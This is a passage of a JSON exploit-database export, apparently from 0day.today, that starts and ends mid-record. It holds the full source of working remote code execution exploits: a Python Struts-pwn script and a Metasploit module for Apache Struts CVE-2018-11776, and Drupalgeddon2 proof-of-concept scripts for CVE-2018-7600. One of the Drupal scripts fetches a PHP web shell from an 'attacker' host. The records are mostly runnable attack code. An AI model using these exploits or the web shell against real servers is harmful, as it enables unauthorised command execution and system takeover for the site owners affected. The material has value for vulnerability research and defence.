{}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email\u00a0protected]@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email\u00a0protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@[email\u00a0protected]('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and non include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@[email\u00a0protected]().getOutputStream())).|\r\n ognl << %q|(@[email\u00a0protected](#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-14T17:44:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "zdt", "title": "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "1337DAY-ID-30171", "href": "https://0day.today/exploit/description/30171", "sourceData": "require 'net/http' \r\n \r\n # Hans Topo ruby port from Drupalggedon2 exploit. \r\n # Based on Vitalii Rudnykh exploit \r\n \r\n target = ARGV[0] \r\n command = ARGV[1] \r\n \r\n url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n \r\n shell = \"<?php system($_GET['cmd']); ?>\" \r\n \r\n payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \r\n \r\n uri = URI(url) \r\n \r\n http = Net::HTTP.new(uri.host,uri.port) \r\n \r\n if uri.scheme == 'https' \r\n \thttp.use_ssl = true \r\n \thttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \r\n end \r\n \r\n req = Net::HTTP::Post.new(uri.path) \r\n req.body = payload \r\n \r\n response = http.request(req) \r\n \r\n if response.code != \"200\" \r\n \tputs \"[*] Response: \" + response.code \r\n \tputs \"[*] Target seems not to be exploitable\" \r\n \texit \r\n end \r\n \r\n puts \"[*] Target seems to be exploitable.\" \r\n \r\n exploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \r\n response = Net::HTTP.get_response(exploit_uri) \r\n puts response.body\r\n\r\n----------------------Exploit PoC 2---------------------------\r\n\r\n import sys \r\n import requests \r\n \r\n print ('################################################################') \r\n print ('# Proof-Of-Concept for CVE-2018-7600') \r\n print ('# by Vitalii Rudnykh') \r\n print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \r\n print ('# https://github.com/a2u/CVE-2018-7600') \r\n print ('################################################################') \r\n print ('Provided only for educational or information purposes\\n') \r\n \r\n target = raw_input('Enter target url (example: https://domain.ltd/): ') \r\n \r\n url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \r\n payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \r\n \r\n r = requests.post(url, data=payload) \r\n if r.status_code != 200: \r\n sys.exit(\"Not exploitable\") \r\n print ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/30171", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T19:55:56", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-04-18T00:00:00", "type": "zdt", "title": "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - Drupalgeddon2 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-18T00:00:00", "id": "1337DAY-ID-30200", "href": "https://0day.today/exploit/description/30200", "sourceData": "#!/usr/bin/env\r\nimport sys\r\nimport requests\r\n \r\nprint ('################################################################')\r\nprint ('# Proof-Of-Concept for CVE-2018-7600')\r\nprint ('# by Vitalii Rudnykh')\r\nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')\r\nprint ('# https://github.com/a2u/CVE-2018-7600')\r\nprint ('################################################################')\r\nprint ('Provided only for educational or information purposes\\n')\r\n \r\ntarget = input('Enter target url (example: https://domain.ltd/): ')\r\n \r\n# Add proxy support (eg. BURP to analyze HTTP(s) traffic)\r\n# set verify = False if your proxy certificate is self signed\r\n# remember to set proxies both for http and https\r\n# \r\n# example:\r\n# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\r\n# verify = False\r\nproxies = {}\r\nverify = True\r\n \r\nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'\r\npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo \";-)\" | tee hello.txt'}\r\n \r\nr = requests.post(url, proxies=proxies, data=payload, verify=verify)\r\ncheck = requests.get(target + 'hello.txt')\r\nif check.status_code != 200:\r\n sys.exit(\"Not exploitable\")\r\nprint ('\\nCheck: '+target+'hello.txt')\n\n# 0day.today [2018-04-20] #", "sourceHref": "https://0day.today/exploit/30200", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T23:26:54", "description": "This Metasploit module exploits a Drupal property injection in the Forms API. Drupal versions 6.x, less than 7.58, 8.2.x, less than 8.3.9, less than 8.4.6, and less than 8.5.1 are vulnerable.", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "zdt", "title": "Drupal Drupalgeddon 2 Forms API Property Injection Exploit", "bulletinFamily": "exploit", "cvss2": {}, 